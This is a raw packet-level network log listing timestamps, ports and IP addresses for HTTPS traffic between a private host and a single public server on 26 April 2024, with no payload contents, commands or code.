Apr 26, 2024 21:35:37.098284960 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.098357916 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.115243912 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.115268946 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.115391016 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.115400076 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.115464926 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.133155107 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.133174896 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.133359909 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.133367062 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.133471012 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.151813030 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.151832104 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.151930094 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.151958942 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.152038097 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.167293072 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.167314053 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.167397976 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.167406082 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.167474985 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.185910940 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.185937881 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.185996056 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.186007023 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.186101913 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.199505091 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.199531078 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.199681997 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.199696064 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.199850082 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.206113100 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.206202984 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.206285000 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.206321001 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.232275009 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.232299089 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:38.470657110 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:38.470707893 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:38.470771074 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:38.471260071 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:38.471272945 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:38.999175072 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:38.999414921 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:39.006428003 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:39.006448030 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.006613970 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:39.006618977 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.833378077 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.833384037 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.833405018 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.833511114 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:39.833544970 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.833677053 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:39.833677053 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:39.953712940 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.953737974 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.953804016 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:39.953839064 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:39.953885078 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.132707119 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.132754087 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.132977962 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.132977962 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.133009911 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.133059025 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.243268967 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.243293047 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.243511915 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.243530989 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.243572950 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.336756945 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.336781025 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.336848974 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.336859941 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.336903095 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.404506922 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.404534101 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.404735088 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.404747963 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.404789925 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.449112892 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.449148893 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.449254990 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.449290037 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.449465036 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.507303953 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.507328033 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.507364988 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.507414103 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.507427931 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.507474899 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.557029009 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.557056904 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.557133913 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.557149887 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.557198048 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.600547075 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.600567102 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.600650072 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.600661039 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.600703955 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.645021915 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.645040035 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.645109892 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.645122051 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.645169973 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.682262897 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.682281017 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.682384014 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.682395935 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.682463884 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.720371008 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.720413923 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.720511913 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.720529079 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.720577002 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.745313883 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.745332003 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.745512962 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.745521069 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.745781898 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.775650024 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.775679111 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.775856018 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.775872946 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.775926113 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.787723064 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.787740946 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.787902117 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.787909985 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.787961006 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.804227114 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.804244041 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.804397106 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.804404974 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.804454088 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.823368073 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.823388100 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.823465109 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.823478937 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.823524952 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.842000008 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.842015982 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.842097998 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.842104912 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.842274904 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.902772903 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.902795076 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.902882099 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.902909994 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.902956009 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.903577089 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.903594017 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.903656960 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.903661013 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.903704882 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.904177904 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.904192924 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.904253960 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.904259920 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.904300928 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.917767048 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.917790890 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.917846918 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.917856932 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.917897940 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.934499025 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.934514046 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.934578896 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.934586048 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.934772015 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.952008009 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.952023983 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.952088118 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.952095985 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.952140093 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.976856947 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.976871967 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.977035999 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.977065086 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.977113962 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.990416050 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.990432024 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.990505934 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:40.990535975 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:40.990590096 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316483021 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316497087 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316550970 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316576004 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316596985 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316607952 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316617012 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316623926 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316653013 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316658974 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316685915 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316687107 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316703081 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316720963 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316749096 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316756964 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316776037 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316797972 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316802025 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316812992 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316816092 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316829920 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316859961 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316864967 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316874027 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316878080 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316885948 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316896915 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316931963 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316932917 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316941977 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316968918 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316972971 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.316983938 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.316987038 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317001104 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317023993 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317028046 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317045927 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317051888 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317065001 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317078114 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317082882 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317106962 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317123890 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317131996 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317136049 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317187071 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317195892 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317199945 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317234993 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317246914 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317261934 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317266941 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317296028 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317302942 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317316055 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317326069 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317329884 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317357063 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317361116 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317384005 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317387104 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317394972 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317418098 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317437887 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317445040 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317450047 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317492962 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317497015 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317502022 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317512989 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317562103 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317564011 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317572117 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317586899 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317591906 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317621946 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317625046 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317637920 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317640066 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317675114 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317675114 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317689896 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317708015 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317712069 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317739010 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317745924 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317756891 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317779064 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317784071 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317811966 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317831039 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317831993 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317840099 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317874908 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317879915 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317909956 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317909956 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317922115 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317929983 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317934990 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317958117 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317979097 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.317981005 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.317992926 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318011999 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318053007 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318057060 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318070889 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318111897 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318129063 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318133116 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318161964 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318182945 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318273067 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318419933 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318434000 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318475008 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318480015 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.318497896 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.318520069 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.319785118 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.320261002 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.326023102 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.326077938 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.326147079 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.326172113 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.326184034 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.326212883 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.332981110 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.333007097 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.333061934 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.333070040 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.333091974 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.333110094 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.342490911 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.342506886 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.342571974 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.342578888 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.342605114 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.342623949 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.354064941 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.354087114 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.354146957 CEST	49751	443	192.168.2.4	95.217.246.168
